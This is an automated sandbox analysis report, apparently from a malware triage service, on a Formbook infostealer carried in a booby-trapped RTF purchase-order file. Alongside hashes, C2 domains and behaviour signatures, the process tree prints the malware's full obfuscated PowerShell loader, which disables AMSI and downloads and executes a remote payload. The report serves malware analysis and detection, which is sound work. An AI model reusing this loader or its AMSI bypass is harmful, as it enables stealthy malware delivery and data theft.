Analysis
-
max time kernel
148s -
max time network
25s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-01-2021 16:49
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-450987643.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
RFQ-450987643.doc.rtf
Resource
win10v20201028
General
-
Target
RFQ-450987643.doc.rtf
-
Size
1.5MB
-
MD5
d1e131610fac2e4923e4b41c143930c0
-
SHA1
b697187ded059e330e334e8959b500b2720b7498
-
SHA256
fe0ebbec69296e6fa9073104bb2f1448bdeeeb040511af7b3bad04fa529da38c
-
SHA512
b013702eb35285c77b950023b86e8f1a30648a7fbc7e3a89edb9bd3df17506cd33ba4f92f35998db637e7fc1a9b5d72a756957a21a825c202cc48e16ed0d4852
Malware Config
Extracted
formbook
http://www.priscilafiorini.com/rcm/
stunninggfe-ready.today
mlmtalks.com
mountainpeakcafe.com
vlmportraits.com
broskiusa.com
yunquenet.com
webinargifts.com
theatomicclean.com
baselinefibertothehome.net
newworldnails.net
plbmw.com
natsringswerp.com
h2o4all.life
alcoholxpress.com
heliumantennaguide.com
amazon-account-app-service.com
gandhiinfotech.com
abacapitals.com
daoxfi.com
radiocota.com
kuroneko-goethe.life
id.coffee
florhodge.com
eca-group.net
vflat.world
manomkt.com
like.vision
mortgagerefinancinginc.com
vulture-yachts.com
xn--hy1bu0vivd7pa.com
croghen.com
xlcsff2020.xyz
doricwilson.com
freisaq.com
innopre.com
newyorkbr.com
fnnanowesterncanada.com
onlinetourspty.com
player-wheels.net
bloomingtonphotography.com
manateetreeservices.com
organicpepperseeds.com
jpq.xyz
deservelevel.technology
my-emissions.com
aspenridgewyoming.com
winyourmillion.com
studentfreedomalliance.com
fatisfying.com
profitableonlinebusiness.site
fufumail.com
acuracollisioncertified.com
rabbicloud.com
dsgqhg.com
beeriderrebates.com
homesecurityfortpierce.com
luabreupersonalizados.com
fashioncentsconsignments.com
buckislandfarms.com
m6onthego.com
triciavogt.com
orgasmornothing.com
iwrfwe.com
testfixmybariatrics.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 600 540 Powershell.exe -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1692-25-0x000000000041EBE0-mapping.dmp formbook behavioral1/memory/1692-24-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/1400-34-0x0000000000080000-0x00000000000AE000-memory.dmp formbook -
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exeflow pid process 7 600 Powershell.exe 9 600 Powershell.exe 11 600 Powershell.exe 13 600 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.exerundll32.exechkdsk.exedescription pid process target process PID 600 set thread context of 1692 600 Powershell.exe rundll32.exe PID 1692 set thread context of 1252 1692 rundll32.exe Explorer.EXE PID 1400 set thread context of 1252 1400 chkdsk.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
chkdsk.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier chkdsk.exe -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2028 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
Powershell.exerundll32.exechkdsk.exepid process 600 Powershell.exe 600 Powershell.exe 600 Powershell.exe 600 Powershell.exe 600 Powershell.exe 600 Powershell.exe 600 Powershell.exe 600 Powershell.exe 1692 rundll32.exe 1692 rundll32.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe 1400 chkdsk.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
rundll32.exechkdsk.exepid process 1692 rundll32.exe 1692 rundll32.exe 1692 rundll32.exe 1400 chkdsk.exe 1400 chkdsk.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exerundll32.exechkdsk.exedescription pid process Token: SeDebugPrivilege 600 Powershell.exe Token: SeIncreaseQuotaPrivilege 600 Powershell.exe Token: SeSecurityPrivilege 600 Powershell.exe Token: SeTakeOwnershipPrivilege 600 Powershell.exe Token: SeLoadDriverPrivilege 600 Powershell.exe Token: SeSystemProfilePrivilege 600 Powershell.exe Token: SeSystemtimePrivilege 600 Powershell.exe Token: SeProfSingleProcessPrivilege 600 Powershell.exe Token: SeIncBasePriorityPrivilege 600 Powershell.exe Token: SeCreatePagefilePrivilege 600 Powershell.exe Token: SeBackupPrivilege 600 Powershell.exe Token: SeRestorePrivilege 600 Powershell.exe Token: SeShutdownPrivilege 600 Powershell.exe Token: SeDebugPrivilege 600 Powershell.exe Token: SeSystemEnvironmentPrivilege 600 Powershell.exe Token: SeRemoteShutdownPrivilege 600 Powershell.exe Token: SeUndockPrivilege 600 Powershell.exe Token: SeManageVolumePrivilege 600 Powershell.exe Token: 33 600 Powershell.exe Token: 34 600 Powershell.exe Token: 35 600 Powershell.exe Token: SeIncreaseQuotaPrivilege 600 Powershell.exe Token: SeSecurityPrivilege 600 Powershell.exe Token: SeTakeOwnershipPrivilege 600 Powershell.exe Token: SeLoadDriverPrivilege 600 Powershell.exe Token: SeSystemProfilePrivilege 600 Powershell.exe Token: SeSystemtimePrivilege 600 Powershell.exe Token: SeProfSingleProcessPrivilege 600 Powershell.exe Token: SeIncBasePriorityPrivilege 600 Powershell.exe Token: SeCreatePagefilePrivilege 600 Powershell.exe Token: SeBackupPrivilege 600 Powershell.exe Token: SeRestorePrivilege 600 Powershell.exe Token: SeShutdownPrivilege 600 Powershell.exe Token: SeDebugPrivilege 600 Powershell.exe Token: SeSystemEnvironmentPrivilege 600 Powershell.exe Token: SeRemoteShutdownPrivilege 600 Powershell.exe Token: SeUndockPrivilege 600 Powershell.exe Token: SeManageVolumePrivilege 600 Powershell.exe Token: 33 600 Powershell.exe Token: 34 600 Powershell.exe Token: 35 600 Powershell.exe Token: SeDebugPrivilege 1692 rundll32.exe Token: SeDebugPrivilege 1400 chkdsk.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2028 WINWORD.EXE 2028 WINWORD.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
EQNEDT32.EXECmD.exePowershell.exeExplorer.EXEchkdsk.exedescription pid process target process PID 1968 wrote to memory of 1824 1968 EQNEDT32.EXE CmD.exe PID 1968 wrote to memory of 1824 1968 EQNEDT32.EXE CmD.exe PID 1968 wrote to memory of 1824 1968 EQNEDT32.EXE CmD.exe PID 1968 wrote to memory of 1824 1968 EQNEDT32.EXE CmD.exe PID 1824 wrote to memory of 1776 1824 CmD.exe cscript.exe PID 1824 wrote to memory of 1776 1824 CmD.exe cscript.exe PID 1824 wrote to memory of 1776 1824 CmD.exe cscript.exe PID 1824 wrote to memory of 1776 1824 CmD.exe cscript.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 600 wrote to memory of 1692 600 Powershell.exe rundll32.exe PID 1252 wrote to memory of 1400 1252 Explorer.EXE chkdsk.exe PID 1252 wrote to memory of 1400 1252 Explorer.EXE chkdsk.exe PID 1252 wrote to memory of 1400 1252 Explorer.EXE chkdsk.exe PID 1252 wrote to memory of 1400 1252 Explorer.EXE chkdsk.exe PID 1400 wrote to memory of 772 1400 chkdsk.exe cmd.exe PID 1400 wrote to memory of 772 1400 chkdsk.exe cmd.exe PID 1400 wrote to memory of 772 1400 chkdsk.exe cmd.exe PID 1400 wrote to memory of 772 1400 chkdsk.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-450987643.doc.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\chkdsk.exe"C:\Windows\SysWOW64\chkdsk.exe"2⤵
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\rundll32.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$8004303583982387500432977682628668=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,48,48,52,51,48,51,53,56,51,57,56,50,51,56,55,53,51,47,56,48,48,52,51,50,57,55,55,54,56,50,54,50,56,54,54,56,47,115,104,101,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($8004303583982387500432977682628668)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\rundll32.exe"{path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
29ac0bc0477f704733355d037e3c4910
SHA1885244aeead819518e9b7a358cc153e511865e50
SHA25622ecd31ded12e74c247368edfdf112653c8c2e555e2f90837e98e9591e145f06
SHA512b4ecece80ca5e8985d407ad51ce303c5587691e3b290b4c660b7f91a6b62bf9d77931a614e2c0a5640bc3de5f96141d457b1cf3eb04433bc6064c9476430ba3b
-
memory/600-19-0x000000001C000000-0x000000001C001000-memory.dmpFilesize
4KB
-
memory/600-14-0x000000001AAE0000-0x000000001AAE1000-memory.dmpFilesize
4KB
-
memory/600-18-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/600-17-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/600-16-0x000000001AA64000-0x000000001AA66000-memory.dmpFilesize
8KB
-
memory/600-23-0x000000001C6F0000-0x000000001C735000-memory.dmpFilesize
276KB
-
memory/600-21-0x000000001AA6A000-0x000000001AA89000-memory.dmpFilesize
124KB
-
memory/600-11-0x000007FEFC511000-0x000007FEFC513000-memory.dmpFilesize
8KB
-
memory/600-12-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmpFilesize
9.9MB
-
memory/600-13-0x0000000002470000-0x0000000002471000-memory.dmpFilesize
4KB
-
memory/600-20-0x000000001C0D0000-0x000000001C0D1000-memory.dmpFilesize
4KB
-
memory/600-15-0x000000001AA60000-0x000000001AA62000-memory.dmpFilesize
8KB
-
memory/772-32-0x0000000000000000-mapping.dmp
-
memory/1252-30-0x0000000006980000-0x0000000006AD1000-memory.dmpFilesize
1.3MB
-
memory/1400-36-0x0000000001E50000-0x0000000001EE3000-memory.dmpFilesize
588KB
-
memory/1400-31-0x0000000000000000-mapping.dmp
-
memory/1400-35-0x0000000002020000-0x0000000002323000-memory.dmpFilesize
3.0MB
-
memory/1400-34-0x0000000000080000-0x00000000000AE000-memory.dmpFilesize
184KB
-
memory/1400-33-0x00000000007B0000-0x00000000007B7000-memory.dmpFilesize
28KB
-
memory/1684-22-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmpFilesize
2.5MB
-
memory/1692-29-0x00000000001B0000-0x00000000001C4000-memory.dmpFilesize
80KB
-
memory/1692-24-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1692-28-0x0000000002220000-0x0000000002523000-memory.dmpFilesize
3.0MB
-
memory/1692-25-0x000000000041EBE0-mapping.dmp
-
memory/1776-7-0x0000000000000000-mapping.dmp
-
memory/1776-10-0x0000000002740000-0x0000000002744000-memory.dmpFilesize
16KB
-
memory/1824-6-0x0000000000000000-mapping.dmp
-
memory/1968-5-0x0000000075C31000-0x0000000075C33000-memory.dmpFilesize
8KB
-
memory/2028-3-0x0000000070A91000-0x0000000070A93000-memory.dmpFilesize
8KB
-
memory/2028-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2028-2-0x0000000073011000-0x0000000073014000-memory.dmpFilesize
12KB